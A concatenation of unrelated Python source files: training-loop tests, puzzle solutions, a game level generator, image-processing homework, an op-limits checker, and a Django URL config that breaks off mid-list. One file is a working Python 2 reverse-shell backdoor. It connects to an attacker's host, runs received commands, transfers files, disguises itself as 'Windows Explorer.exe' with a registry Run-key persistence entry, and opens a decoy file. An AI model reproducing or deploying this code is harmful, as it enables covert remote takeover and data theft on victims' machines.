    # List the archived copies, oldest first (-lrt), into the scratch file.
    cmd   = 'ls -lrt ' + main_dir + '/Past_data/op_limits* > ' + zspace
    os.system(cmd)
    olist = mcf.read_data_file(zspace, remove=1)

    # NOTE(review): both tokens come from the LAST ls line; for a long
    # listing, atemp[-1] is the newest file but atemp[-2] is likely a
    # timestamp token, not the previous file — intended was presumably
    # the last tokens of olist[-2] and olist[-1].  Verify before relying
    # on this comparison.
    out    = olist[-1]
    atemp  = re.split('\s+', out)
    lfile1 = atemp[-2]
    lfile2 = atemp[-1]

    cmd = 'diff ' + lfile1 + ' ' + lfile2 + ' > ' + zspace
    os.system(cmd)
    out = mcf.read_data_file(zspace, remove=1)

    # Keep only lines unique to the older file ("<" side of the diff).
    missing = []
    for ent in out:
        if ent[0] == ">":
            continue
        else:
            missing.append(ent)

    if len(missing) > 0:
        line = 'Following lines are missing/different in the updata data from the past data:\n\n'
        for ent in missing:
            line = line + ent + '\n'

        with open(zspace, 'w') as fo:
            fo.write(line)

        # Email the discrepancy report, then remove the scratch file.
        cmd = 'cat ' + zspace + ' |mailx -s "Subject: Possible op_limit Problems" tisobe@cfa.harvard.edu'
        os.system(cmd)

        mcf.rm_files(zspace)
#------------------------------------------------------------------------
if __name__ == "__main__":
    # Clean the table first, then verify nothing was lost vs. past copies.
    clean_table()
    check_entry()
|
from event_bot import EventBot
|
import time
import shutil
import subprocess
import pytest
from dps.run import _run
from dps.rl.algorithms.a2c import reinforce_config
from dps.train import training_loop, Hook
from dps.env.advanced import translated_mnist
from dps.env.advanced import simple_addition
from dps.config import DEFAULT_CONFIG
from dps.utils import Alarm
from dps.utils.tf import get_tensors_from_checkpoint_file
@pytest.mark.slow
def test_time_limit(test_config):
    """Training must stop within ``max_time`` (plus ~1s of slack).

    Bug fix: elapsed time was computed as ``start - time.time()`` — always
    negative — which made the final assertion vacuously true.
    """
    config = DEFAULT_CONFIG.copy()
    config.update(simple_addition.config)
    config.update(reinforce_config)
    config.update(max_time=120, max_steps=10000, seed=100)
    config.update(test_config)

    start = time.time()
    with config:
        training_loop()
    elapsed = time.time() - start
    assert elapsed < config.max_time + 1
class AlarmHook(Hook):
    """Hook that raises ``Alarm`` at the start or end of a chosen stage."""

    def __init__(self, start, stage_idx):
        self.start = start          # True: fire in start_stage; False: in end_stage
        self.stage_idx = stage_idx  # stage index at which to fire
        super(AlarmHook, self).__init__()

    def start_stage(self, training_loop, stage_idx):
        if stage_idx == self.stage_idx and self.start:
            raise Alarm("Raised by AlarmHook")

    def end_stage(self, training_loop, stage_idx):
        if stage_idx == self.stage_idx and not self.start:
            raise Alarm("Raised by AlarmHook")
@pytest.mark.slow
def test_time_limit_between_stages(test_config):
    """An Alarm raised between stages must end training promptly.

    Bug fix: elapsed time was computed as ``start - time.time()`` — always
    negative — which made the 20-second bound vacuously true.
    """
    config = DEFAULT_CONFIG.copy()
    config.update(simple_addition.config)
    config.update(reinforce_config)
    config.update(max_time=120, max_steps=10, seed=100)
    config.update(hooks=[AlarmHook(False, 0)])
    config.update(test_config)

    start = time.time()
    with config:
        result = training_loop()
        print(result)
    elapsed = time.time() - start
    assert elapsed < 20
class DummyHook(Hook):
    """Hook that keeps appending ``base_config`` stages until ``n_stages``
    stages exist, by editing the next remaining stage at each stage end."""

    def __init__(self, n_stages, base_config):
        self.n_stages = n_stages
        self.base_config = base_config
        super(DummyHook, self).__init__()

    def _attrs(self):
        return ["n_stages", "base_config"]

    def end_stage(self, training_loop, stage_idx):
        more_stages_needed = stage_idx < self.n_stages - 1
        if more_stages_needed:
            training_loop.edit_remaining_stage(0, self.base_config)
def test_stage_hook(test_config):
    """ Test that we can safely use hooks to add new stages. """
    config = DEFAULT_CONFIG.copy()
    config.update(simple_addition.config)
    config.update(reinforce_config)
    # One explicit curriculum stage; DummyHook should grow it to 3 stages,
    # each added stage carrying max_steps=21.
    config.update(
        max_steps=11, eval_step=10, n_train=100, seed=100,
        hooks=[DummyHook(3, dict(max_steps=21))],
        curriculum=[dict()],
        width=1,
    )
    config.update(test_config)

    with config:
        data = training_loop()

    assert data.n_stages == 3
    # The original stage has no extra config; the hook-added ones do.
    assert not data.history[0]["stage_config"]
    assert data.history[1]["stage_config"]["max_steps"] == 21
    assert data.history[2]["stage_config"]["max_steps"] == 21
def grep(pattern, filename, options=""):
    """Run the system ``grep`` over *filename* and return stdout as text.

    Raises ``subprocess.CalledProcessError`` when grep exits non-zero
    (e.g. no lines matched).
    """
    command = 'grep {} "{}" {}'.format(options, pattern, filename)
    raw = subprocess.check_output(command, shell=True)
    return raw.decode()
def _check_mode_data(frozen_data, mode, rows_per_stage):
    """Check per-stage and aggregate step data for one recording mode.

    Verifies each of the 3 stages individually, then the concatenated
    (``None``) view, then that tuple and slice stage selectors return the
    same frame as the concatenated view.

    NOTE(review): ``DataFrame.ix`` is deprecated and removed in modern
    pandas — migrate to ``.loc``/``.iloc`` when the pinned pandas allows.
    """
    for stage_idx in range(3):
        df = frozen_data.step_data(mode, stage_idx)
        assert df.shape[0] == rows_per_stage
        assert (df['stage_idx'] == stage_idx).all()

    combined = frozen_data.step_data(mode, None)
    assert combined.shape[0] == 3 * rows_per_stage
    assert combined.ix[0, 'stage_idx'] == 0
    assert combined.ix[0, 'local_step'] == 0
    assert combined.ix[0, 'global_step'] == 0
    assert combined.iloc[-1]['stage_idx'] == 2
    assert combined.iloc[-1]['local_step'] == 100
    assert combined.iloc[-1]['global_step'] == 302

    by_tuple = frozen_data.step_data(mode, (0, 3))
    assert (combined == by_tuple).all().all()
    by_slice = frozen_data.step_data(mode, slice(0, 3))
    assert (combined == by_slice).all().all()


def test_train_data(test_config):
    """Step data recorded during training is retrievable per stage and mode.

    The original repeated the same ~20-line verification block for the
    train, val and test modes; that logic now lives in _check_mode_data.
    """
    config = test_config.copy()
    config.update(max_steps=101, checkpoint_step=43, eval_step=100)

    frozen_data = _run('hello_world', 'a2c', _config=config)

    # train: one row per training step (max_steps=101).
    _check_mode_data(frozen_data, 'train', 101)

    # off_policy: not recorded by this algorithm.
    off_policy = frozen_data.step_data('off_policy', 0)
    assert off_policy is None

    # val / test: evaluated at local steps 0 and 100 (eval_step=100).
    _check_mode_data(frozen_data, 'val', 2)
    _check_mode_data(frozen_data, 'test', 2)
@pytest.mark.slow
def test_fixed_variables(test_config):
    """ Test that variables stay fixed when we use use `ScopedFunction.fix_variables`.

    Four runs: (1) train and save classifier weights; (2) reload with
    fix_classifier=True and no training — weights must be identical;
    (3) reload fixed and train — weights must STILL be identical;
    (4) reload unfixed and train — weights must now differ.
    """
    digits = [0, 1]
    config = translated_mnist.config.copy(
        env_name="test_fixed_variables", render_step=0, n_patch_examples=1000,
        value_weight=0.0, opt_steps_per_update=20, image_shape=(20, 20),
        max_steps=101, eval_step=10, use_gpu=False, seed=1034340,
        model_dir="/tmp/dps_test/models", n_train=100, digits=digits
    )
    config['emnist_config:threshold'] = 0.1
    config['emnist_config:n_train'] = 1000
    config['emnist_config:classes'] = digits
    config.emnist_config.update(test_config)

    # Start from a clean model directory so run 1 trains from scratch.
    try:
        shutil.rmtree(config.model_dir)
    except FileNotFoundError:
        pass

    config.update(test_config)
    config.update(fix_classifier=False, pretrain_classifier=True)

    # ------------- First run
    _config = config.copy(name="PART_1")
    output = _run("translated_mnist", "a2c", _config=_config)
    load_path1 = output.path_for('weights/best_of_stage_0')
    tensors1 = get_tensors_from_checkpoint_file(load_path1)

    # Only the digit-classifier variables are subject to fixing.
    prefix = "{}/digit_classifier".format(translated_mnist.AttentionClassifier.__name__)
    relevant_keys = [key for key in tensors1 if key.startswith(prefix)]
    assert len(relevant_keys) > 0

    # ------------- Second run, reload, no training
    _config = config.copy(
        name="PART_2",
        fix_classifier=True,
        pretrain_classifier=False,
        load_path=load_path1,
        do_train=False,
    )
    output = _run("translated_mnist", "a2c", _config=_config)
    load_path2 = output.path_for('weights/best_of_stage_0')
    tensors2 = get_tensors_from_checkpoint_file(load_path2)
    for key in relevant_keys:
        assert (tensors1[key] == tensors2[key]).all(), "Error on tensor with name {}".format(key)

    # ------------- Third run, reload with variables fixed, do some training, assert that variables haven't changed
    _config = config.copy(
        name="PART_3",
        fix_classifier=True,
        pretrain_classifier=False,
        load_path=load_path1,
        max_steps=101,
        do_train=True,
    )
    output = _run("translated_mnist", "a2c", _config=_config)
    load_path3 = output.path_for('weights/best_of_stage_0')
    tensors3 = get_tensors_from_checkpoint_file(load_path3)
    for key in relevant_keys:
        assert (tensors1[key] == tensors3[key]).all(), "Error on tensor with name {}".format(key)

    # ------------- Fourth run, reload with variables NOT fixed, do some training, assert that the variables are different
    _config = config.copy(
        name="PART_4",
        fix_classifier=False,
        pretrain_classifier=False,
        load_path=load_path1,
        max_steps=101,
        do_train=True,
    )
    output = _run("translated_mnist", "a2c", _config=_config)
    load_path4 = output.path_for('weights/best_of_stage_0')
    tensors4 = get_tensors_from_checkpoint_file(load_path4)
    for key in relevant_keys:
        assert (tensors1[key] != tensors4[key]).any(), "Error on tensor with name {}".format(key)
|
# State recurrence (DP over column profiles)
# Can be optimized further with matrix fast exponentiation
# (see the commented-out C++ version below) — easy!
MOD = 10**9 + 7

class Solution:
    def numTilings(self, n: int) -> int:
        """LeetCode 790: count tilings of a 2 x n board with dominoes and
        L-trominoes, modulo 10**9 + 7.

        Linear recurrence over four column-profile states; ``s4`` carries
        the answer.  O(n) time, O(1) extra space.
        """
        s1, s2, s3, s4 = 1, 0, 0, 1
        for _ in range(2, n + 1):
            s1, s2, s3, s4 = (
                s4 % MOD,
                (s1 + s3) % MOD,
                (s1 + s2) % MOD,
                (s1 + s2 + s3 + s4) % MOD,
            )
        return s4
# #define rep(i,l,r) for(int i=(l);i<=(r);++i)
# #define rpe(i,r,l) for(int i=(r);i>=(l);--i)
# inline int max(int x,int y){return x>y?x:y;}
# #define M 1000000007
# typedef long long ll;
# typedef vector<ll> vec;
# typedef vector<vec> mat; // 矩阵
# // 递推式&矩阵快速幂 问题
# // 计算A*B
# mat mul(mat& A, mat& B) {
# // A (ma * na) B (mb * nb) => C(ma * nb)
# mat C(A.size(), vec(B[0].size()));
# for (int i = 0; i < A.size(); i++) {
# for (int k = 0; k < B.size(); k++) {
# for (int j = 0; j < B[0].size(); j++) {
# C[i][j] += A[i][k] * B[k][j];
# C[i][j] %= M;
# }
# }
# }
# return C;
# }
# // 快速幂计算A^n
# mat pow(mat A, int n) {
# mat B(A.size(), vec(A.size())); //base
# for (int i = 0; i < A.size(); i++) {
# B[i][i] = 1;
# }
# while (n > 0) {
# if (n & 1) B = mul(B, A);
# A = mul(A, A);
# n >>= 1;
# }
# return B;
# }
# /*-------------------矩阵快速幂模板----------------------------*/
# class Solution {
# public:
# int numTilings(int n) {
# // 初始矩阵
# mat B(4, vec(1));
# B[0][0] = B[3][0] = 1;
# B[1][0] = B[2][0] = 0;
# // 递推矩阵
# mat A(4,vec(4,0));
# A[0][3] = A[1][0] = A[1][2] = A[2][0] = A[2][1] = A[3][0] = A[3][1] = A[3][2] = A[3][3] = 1;
# A = pow(A, n-1);
# B = mul(A, B);
# return B[3][0];
# }
# };
# 作者:bosshhh
# 链接:https://leetcode-cn.com/problems/domino-and-tromino-tiling/solution/python-c-ju-zhen-kuai-su-mi-ji-bai-100-b-izrz/
# 来源:力扣(LeetCode)
# 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import blocks
import boosts
import monsters
import random
import config_level_generator as clg
from config_entity import WIDTH
class LevelGenerator:
    """Procedurally populates one game level — exit door, booster, hard and
    simple platforms, and monsters — on a grid of clg.WIDTH_IN_BLOCKS x
    clg.HEIGHT_IN_BLOCKS cells, each WIDTH pixels square.

    Refactor: the random-cell-selection logic was duplicated (with tiny
    parameter differences) across four methods; it now lives in
    _random_cell / _random_free_cell, preserving the exact sequence of
    random.randint calls of the original.
    """

    def __init__(self, game):
        self.game = game
        # Cells already occupied by the exit, booster, monsters or platforms.
        self.locked_coordinates = []
        self.right_width = clg.WIDTH_IN_BLOCKS - 2
        self.center = self.right_width // 2

    def get_level(self):
        """Build one complete level into self.game."""
        self.choose_booster()
        self.make_exit_hider()
        self.make_booster_hider()
        self.make_hard_platforms()
        self.make_monsters()
        self.make_simple_platforms()
        self.locked_coordinates.clear()

    def choose_booster(self):
        """Pick this level's booster; special ones every 10th/20th level."""
        if self.game.hero.level % 20 == 0:
            self.booster = 2
        elif self.game.hero.level % 10 == 0:
            self.booster = 3
        else:
            self.booster = random.randint(0, 1)

    def _random_cell(self, y_max, safe_offset):
        """Pick a random grid cell with y in [1, y_max].

        While y lies inside the safe zone, x also starts at ``safe_offset``
        so the cell keeps clear of the hero's spawn corner.  On even rows x
        is capped at center*2+1, on odd rows at right_width (presumably to
        account for the hard-platform pillars on even rows — see
        make_hard_platforms).
        """
        y = random.randint(1, y_max)
        x_min = safe_offset if y < safe_offset else 1
        x_max = self.center * 2 + 1 if y % 2 == 0 else self.right_width
        return random.randint(x_min, x_max), y

    def _random_free_cell(self, y_max, safe_offset):
        """Like _random_cell, but reroll until the cell is unoccupied."""
        while True:
            x, y = self._random_cell(y_max, safe_offset)
            if (x, y) not in self.locked_coordinates:
                return x, y

    def make_exit_hider(self):
        """Place the exit door under a destructible platform."""
        exit_x, exit_y = self._random_cell(9, clg.SAFE_ZONE)
        self.locked_coordinates.append((exit_x, exit_y))
        self.game.exit = blocks.ExitDoor(exit_x * WIDTH, exit_y * WIDTH)
        self.game.exit_hider = blocks.Platform(exit_x * WIDTH, exit_y * WIDTH)
        self.game.add_sprite(self.game.exit_hider)

    def make_booster_hider(self):
        """Place the chosen booster under a destructible platform."""
        boost_x, boost_y = self._random_free_cell(
            clg.HEIGHT_IN_BLOCKS - 3, clg.SAFE_ZONE)
        self.locked_coordinates.append((boost_x, boost_y))
        if self.booster == 0:
            self.game.boost = boosts.Additional_Life(boost_x * WIDTH,
                                                     boost_y * WIDTH)
        elif self.booster == 1:
            self.game.boost = boosts.Strength_Up(boost_x * WIDTH,
                                                 boost_y * WIDTH)
        elif self.booster == 2:
            self.game.boost = boosts.Remote_Bombs_Boost(boost_x * WIDTH,
                                                        boost_y * WIDTH)
        else:
            self.game.boost = boosts.Many_Bombs_Boost(boost_x * WIDTH,
                                                      boost_y * WIDTH)
        self.game.boost_hider = blocks.Platform(boost_x * WIDTH,
                                                boost_y * WIDTH)
        self.game.add_sprite(self.game.boost_hider)

    def make_hard_platforms(self):
        """Indestructible border walls plus a pillar at every even (x, y)."""
        for x in range(clg.WIDTH_IN_BLOCKS):
            for y in range(clg.HEIGHT_IN_BLOCKS):
                if(x == 0 or y == 0 or x == clg.WIDTH_IN_BLOCKS - 1
                   or y == clg.HEIGHT_IN_BLOCKS - 1
                   or (x % 2 == 0 and y % 2 == 0)):
                    pf = blocks.Hard_Platform(x * WIDTH, y * WIDTH)
                    self.game.add_sprite(pf)

    def make_monsters(self):
        """Spawn level-scaled monsters on free cells.

        Harder monster types unlock after levels 5 and 15; the count grows
        with level, capped at 14.
        """
        types_of_monsters = 1
        if self.game.hero.level > 15:
            types_of_monsters = 3
        elif self.game.hero.level > 5:
            types_of_monsters = 2
        for _ in range(1, min(15, 5 + self.game.hero.level // 5)):
            monster_x, monster_y = self._random_free_cell(
                clg.HEIGHT_IN_BLOCKS - 3, clg.SAFE_ZONE - 1)
            monster_type = random.randint(1, types_of_monsters)
            if monster_type == 1:
                monster = monsters.Baloon(monster_x * WIDTH, monster_y * WIDTH)
                self.game.baloon_monsters.append(monster)
            elif monster_type == 2:
                monster = monsters.Shadow(monster_x * WIDTH, monster_y * WIDTH)
                self.game.shadow_monsters.append(monster)
            else:
                monster = monsters.Chaser(monster_x * WIDTH, monster_y * WIDTH)
                self.game.chaser_monsters.append(monster)
            self.game.add_sprite(monster)
            self.locked_coordinates.append((monster_x, monster_y))

    def make_simple_platforms(self):
        """Scatter up to 59 destructible platforms on free cells."""
        for _ in range(1, 60):
            block_x, block_y = self._random_free_cell(9, clg.SAFE_ZONE - 3)
            pf = blocks.Platform(block_x * WIDTH, block_y * WIDTH)
            self.game.add_sprite(pf)
            self.locked_coordinates.append((block_x, block_y))
|
import numpy as np

# Sanity check: a reward of +/-10 discounted over 500 steps with gamma=0.99
# shrinks to gamma**500 * r0 (~ +/-0.066), i.e. far-future rewards barely
# matter. The original multiplied by gamma and subtracted a dead `- 0` each
# step; the subtraction and the unused loop variable were removed.
gamma = 0.99
positive_reward = 10
negative_reward = -10
for _ in range(500):
    positive_reward = gamma * positive_reward
for _ in range(500):
    negative_reward = gamma * negative_reward
print('positive_reward', positive_reward)
print('negative_reward', negative_reward)
# discretization grid from -10 to 10 in steps of 0.4
print(np.linspace(-10, 10, 51))
|
#! /usr/bin/python
"""A simple reverse backdoor script.
Uses Python 2.7.16"""
import subprocess
import optparse
import shutil
import base64
import socket
import json
import sys
import os
def get_arguments():
    """Parse the attacker IP, port and decoy file options from the command line."""
    parser = optparse.OptionParser()
    # supported flags
    parser.add_option('-a', '--attacker', dest='attacker', help='Attacking host IP.')
    parser.add_option('-p', '--port', dest='port', help='Port to connect to.')
    parser.add_option('-f', '--file', dest='file', help='Safe file to embed.')
    options, _ = parser.parse_args()
    return options
class Backdoor:
    """Reverse-shell client: connects back to an attacker's listener and
    executes received commands, replying over a length-unframed JSON protocol.

    NOTE(review): written for Python 2 (socket send/recv on str) -- confirm
    the target interpreter before porting.
    """

    def __init__(self, ip, port):
        """Install persistence, then open a TCP connection to (ip, port)."""
        self.become_persistent()
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4 and TCP
        self.connection.connect((ip, port))  # establishes connection

    def become_persistent(self):
        """On Windows, copy this executable into APPDATA and register it under
        the HKCU Run key so it starts on every logon. No-op elsewhere."""
        if 'win' in sys.platform:
            evil_file_location = os.environ['appdata'] + '\\Windows Explorer.exe'
            if not os.path.exists(evil_file_location):
                # copies file to location
                shutil.copyfile(sys.executable, evil_file_location)
                # add executable to Windows registry (raw string keeps the
                # registry-path backslashes literal instead of escape sequences)
                subprocess.call(r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v update /t REG_SZ /d "' + evil_file_location + '"', shell=True)

    def reliable_send(self, data):
        """Serialize *data* as JSON and send it over the socket."""
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_receive(self):
        """Receive until a complete JSON value has arrived, then decode it.

        BUG FIX: the original used `continue` outside any loop (a
        SyntaxError). A payload larger than one recv() chunk must keep
        reading until json.loads succeeds.
        """
        json_data = ''
        while True:
            try:
                json_data += self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                # partial JSON -- keep receiving
                continue

    def execute_system_command(self, command):
        """Run *command* in a shell and return its captured stdout."""
        DEVNULL = open(os.devnull, 'wb')
        return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL)

    def change_working_directory(self, path):
        """chdir to *path* and return a confirmation message."""
        os.chdir(path)
        return('[+] Changing working directory to ' + path)

    def read_file(self, path):
        """Return the file's bytes base64-encoded (download support)."""
        with open(path, 'rb') as file:
            return base64.b64encode(file.read())  # encodes unknown characters to known characters

    def write_file(self, path, contents):
        """Decode base64 *contents* and write them to *path* (upload support)."""
        with open(path, 'wb') as file:
            file.write(base64.b64decode(contents))  # re-encodes characters
            return '[+] Upload successful...'

    def run(self):
        """Main loop: receive a command list, dispatch it, send back the result."""
        while True:
            command = self.reliable_receive()
            try:
                if command[0] == 'exit':
                    self.connection.close()
                    sys.exit()
                elif command[0] == 'cd' and len(command) > 1:
                    command_result = self.change_working_directory(command[1])
                elif command[0] == 'download':
                    command_result = self.read_file(command[1])
                elif command[0] == 'upload':
                    command_result = self.write_file(command[1], command[2])
                else:
                    command_result = self.execute_system_command(command)
            except Exception:
                command_result = '[-] Error during command execution.'
            self.reliable_send(command_result)
# --- entry point -------------------------------------------------------------
options = get_arguments()
# NOTE(review): sys._MEIPASS only exists when frozen with PyInstaller; running
# from plain source will raise AttributeError here -- confirm packaging.
file_name = sys._MEIPASS + '\\' + options.file
subprocess.Popen(file_name, shell=True)  # launch the decoy file
try:
    # BUG FIX: optparse stores the IP under dest='attacker' (there is no
    # options.ip attribute), and socket.connect needs an integer port.
    my_backdoor = Backdoor(options.attacker, int(options.port))
    my_backdoor.run()
except Exception:
    sys.exit()
print('Got a connection from: ' + options.attacker + ':' + options.port)
|
#문제 설명
#새로 생긴 놀이기구는 인기가 매우 많아 줄이 끊이질 않습니다. 이 놀이기구의 원래 이용료는 price원 인데, 놀이기구를 N 번 째 이용한다면 원래 이용료의 N배를 받기로 하였습니다. 즉, 처음 이용료가 100이었다면 2번째에는 200, 3번째에는 300으로 요금이 인상됩니다.
#놀이기구를 count번 타게 되면 현재 자신이 가지고 있는 금액에서 얼마가 모자라는지를 return 하도록 solution 함수를 완성하세요.
#단, 금액이 부족하지 않으면 0을 return 하세요.
# 제한사항
# 놀이기구의 이용료 price : 1 ≤ price ≤ 2,500, price는 자연수
# 처음 가지고 있던 금액 money : 1 ≤ money ≤ 1,000,000,000, money는 자연수
# 놀이기구의 이용 횟수 count : 1 ≤ count ≤ 2,500, count는 자연수
# 입출력 예
# price money count result
# 3 20 4 10
def solution(price, money, count):
    """Return how much money is missing to ride *count* times.

    The i-th ride costs price * i, so the total is the arithmetic series
    price * count * (count + 1) / 2 (computed in closed form instead of a
    loop). Returns 0 when *money* already covers the total.

    :param price: base fare of the ride (natural number)
    :param money: money currently held
    :param count: number of rides taken
    """
    total = price * count * (count + 1) // 2
    return max(0, total - money)
|
import numpy as np
import matplotlib.pyplot as plt
import os
import utils
# Import MNIST data
PLOT_DIR = './out/plots'
def plot_conv_weights(weights, name, channels_all=True):
    """
    Plots convolutional filters as one image grid per input channel.

    :param weights: numpy array of rank 4, layout (h, w, in, out)
    :param name: string, name of convolutional layer
    :param channels_all: boolean, plot every input channel when True
    :return: nothing, plots are saved on the disk
    """
    # output folder: PLOT_DIR/conv_weights/<name>; create or empty it
    out_dir = os.path.join(PLOT_DIR, 'conv_weights', name)
    utils.prepare_dir(out_dir, empty=True)

    # shared color scale across every filter of the layer
    w_min, w_max = np.min(weights), np.max(weights)

    # input channels to render (just the first one unless channels_all)
    channels = range(weights.shape[2]) if channels_all else [0]

    # grid layout sized to the number of output filters
    grid_r, grid_c = utils.get_grid_dim(weights.shape[3])
    fig, axes = plt.subplots(min([grid_r, grid_c]),
                             max([grid_r, grid_c]))

    for channel in channels:
        # one subplot per filter of this channel
        for idx, ax in enumerate(axes.flat):
            ax.imshow(weights[:, :, channel, idx], vmin=w_min, vmax=w_max,
                      interpolation='nearest', cmap='seismic')
            # no tick labels on filter thumbnails
            ax.set_xticks([])
            ax.set_yticks([])
        plt.savefig(os.path.join(out_dir, '{}-{}.png'.format(name, channel)),
                    bbox_inches='tight')
import torch
import ZZYResNet18
# load a trained CIFAR-10 checkpoint and switch the model to inference mode
model = ZZYResNet18.ZZYResNet18(n_classes=10)
model.load_state_dict(torch.load("./cifar_net89.pth"))
model.eval()
import matplotlib
# named tensors: reorder conv1 weights from (out, in, h, w) into the
# (h, w, in, out) layout that plot_conv_weights expects
w_tensor = model.conv1.weight.refine_names('out', 'in', 'h', 'w')
plot_conv_weights(w_tensor.align_to('h', 'w', 'in', 'out').detach().numpy(), 'conv1', channels_all=True)
|
from tools.primes import factors_of
import numpy as np
def is_abundant(n):
    """True when the proper divisors of *n* sum to more than n itself.

    factors_of(n) is assumed to end with n itself, hence the [:-1] slice.
    """
    return n < sum(factors_of(n)[:-1])
'''
plan of attack:
gen all abundant numbers till 28K
then do for all i,j in the abundant numbers, store the sums of those
then filter a range till 28k with those sums, and then sum out the leftovers
'''
# Project Euler 23: sum of all integers that cannot be written as the sum of
# two abundant numbers. 28123 is the classic upper bound.
candidates = np.arange(1, 28123)

# collect every abundant number below the bound
abundant = np.array([value for value in candidates if is_abundant(value)])

# all pairwise sums of two abundant numbers; a set collapses duplicates and
# makes membership bookkeeping cheap while accumulating
pair_sums = set()
for value in abundant:
    pair_sums.update((value + abundant).tolist())

# np.in1d wants an array, not a set
pair_sums = np.array(sorted(pair_sums))
not_expressible = np.logical_not(np.in1d(candidates, pair_sums))
print(sum(candidates[not_expressible]))
|
import cv2
import numpy as np
import matplotlib.pyplot as plt
import math as m
#==1.ukol===============================================================================================================
def custom_grayscale(image):
    """Convert a 3-channel image to grayscale in place and return it.

    Each pixel becomes ch0*0.3 + ch1*0.59 + ch2*0.11, broadcast to all
    three channels.

    BUG FIX: both loops started at 1, silently leaving the first row and
    first column unconverted; they now start at 0.
    NOTE(review): cv2.imread yields BGR, so channel 0 here is blue while
    0.3 is the usual red weight -- confirm the intended channel order.
    """
    for i in range(len(image)):
        for j in range(len(image[0])):
            image[i, j] = image[i, j, 0] * 0.3 + image[i, j, 1] * 0.59 + image[i, j, 2] * 0.11
    return image
#==2.ukol===============================================================================================================
def custom_histogram(greyscale_image):
    """Plot a 256-bin intensity histogram of a 2-D grayscale image.

    BUG FIX: both loops started at index 1, dropping the first row and the
    first column from the histogram; they now start at 0.
    """
    hist = np.zeros(256)
    for i in range(len(greyscale_image)):
        for j in range(len(greyscale_image[0])):
            hist[greyscale_image[i, j]] += 1
    plt.title("Custom Histogram")
    plt.xlabel("Greyscale")
    plt.ylabel("Amount")
    plt.plot(hist)
    plt.show()
#==3.ukol==RGB>>YCbCr===================================================================================================
def rgb_to_ycbcr(image):
    """Per-pixel conversion to YCbCr using BT.601-style coefficients with
    +16 / +128 offsets; returns a new array, the input is left untouched.

    NOTE(review): the input comes from cv2.imread and is therefore BGR, yet
    channel 0 is multiplied by 0.299 (the conventional red weight) -- confirm
    whether the R/B swap is intended.
    NOTE(review): results are written straight into a uint8 copy, so values
    outside 0..255 (e.g. Y + 16 on bright pixels) wrap around -- verify.
    """
    height, width = image.shape[:2]
    ycbcr = image.copy()
    for i in range(0, height):
        for j in range(0, width):
            ycbcr[i, j, 0] = (image[i, j, 0] * 0.299) + (image[i, j, 1] * 0.587) + (image[i, j, 2] * 0.114) + 16
            ycbcr[i, j, 1] = (image[i, j, 0] * -0.169) + (image[i, j, 1] * -0.331) + (image[i, j, 2] * 0.500) + 128
            ycbcr[i, j, 2] = (image[i, j, 0] * 0.500) + (image[i, j, 1] * -0.419) + (image[i, j, 2] * -0.081) + 128
    return ycbcr
def rgb_to_hsi(image):
    """Convert a BGR uint8 image to HSI (hue / saturation / intensity).

    Returns a uint8 copy with hue (radians) in channel 0 and intensity
    (0..1) in channel 2; saturation is left as in the input (the original
    computation is kept commented out below).

    BUG FIX: the hue denominator must be sqrt((r-g)^2 + (r-b)(g-b)); the
    original applied ** (1/2) only to the second term. Achromatic pixels
    (r == g == b) now get hue 0 instead of a division-by-zero / acos
    domain error, and the acos argument is clamped against float rounding.
    NOTE(review): storing radians/fractions into a uint8 array truncates
    almost everything to 0 or 1 -- confirm a float output isn't wanted.
    """
    height, width = image.shape[:2]
    hsi = image.copy()
    for i in range(height):
        for j in range(width):
            b = image[i, j, 0] / 255
            g = image[i, j, 1] / 255
            r = image[i, j, 2] / 255
            minimal = min([r, g, b])  # used by the commented-out saturation line
            citatel = (1 / 2) * ((r - g) + (r - b))
            jmenovatel = ((r - g) ** 2 + (r - b) * (g - b)) ** (1 / 2)
            if jmenovatel == 0:
                # achromatic pixel: hue is undefined, use 0
                hsi[i, j, 0] = 0
            else:
                hsi[i, j, 0] = m.acos(max(-1.0, min(1.0, citatel / jmenovatel)))
            #hsi[i,j,1]=1-((3/(r+g+b))*minimal)
            hsi[i, j, 2] = (r + g + b) / 3
    return hsi
def showChannel(img, channel):
    """Return a copy of *img* with every color channel except *channel*
    zeroed out; an out-of-range channel yields an unmodified copy."""
    isolated = img.copy()
    if channel in (0, 1, 2):
        for c in (0, 1, 2):
            if c != channel:
                isolated[:, :, c] = 0
    return isolated
def isolate_channel(image, threshold, channel):
    """Black out (in place) every pixel whose YCbCr *channel* value is
    below *threshold*, and return the mutated image.

    The redundant `ycbcr = image.copy()` from the original was removed:
    rgb_to_ycbcr already works on its own copy, so the assignment was
    immediately overwritten dead code.
    """
    ycbcr = rgb_to_ycbcr(image)
    height, width = image.shape[:2]
    for i in range(height):
        for j in range(width):
            if ycbcr[i, j, channel] < threshold:
                image[i, j, :] = 0
    return image
#==DEBUGGING (orig: LADENI)=============================================================================================
# ad-hoc visual checks; earlier experiments are kept commented out
flowers = cv2.imread("kostky.png")
#cv2.imshow("Flowers",rgb_to_ycbcr(showChannel(flowers,1)))
#cv2.imshow("Flowers2", isolate_channel(flowers, 190, 1))
#custom_histogram(rgb_to_ycbcr(showChannel(flowers,2)))
#flowers2 = cv2.cvtColor(flowers, cv2.COLOR_BGR2YCrCb)
#cv2.imshow("Flowers2", flowers2)
#cv2.imshow("Flowers3", rgb_to_ycbcr(flowers));
cv2.imshow("Bricks", rgb_to_hsi(flowers))
# block until a key press, then close all OpenCV windows
cv2.waitKey(0)
cv2.destroyAllWindows()
'''
ukol 4 počítačové vidění 2017 přihlásit se jako host heslo: pvi
přednáška č. 2 cca
0-min 1-max místo 255 nebo 65535
prostor YCbCr
hue saturation
cvtcolor zkusit
zprogramovat hue ycbcr, zobrazit jednu barevnou složku, jednu barvu roznásovit v matici prní sloupec r druhý sloupec g třetí sloupec b plus offset
'''
|
from django.conf.urls import include, url
from api import views
from django.views.decorators.csrf import csrf_exempt

# route prefix -> class-based view; every endpoint shares the same
# ^<prefix>/(?P<action>\w+)/$ URL shape and is CSRF-exempt.
_ROUTES = (
    ('server', views.Server),
    ('account', views.Account),
    ('upload', views.Upload),
    ('project', views.Project),
    ('datacenter', views.DataCenter),
    ('machineroom', views.MachineRoom),
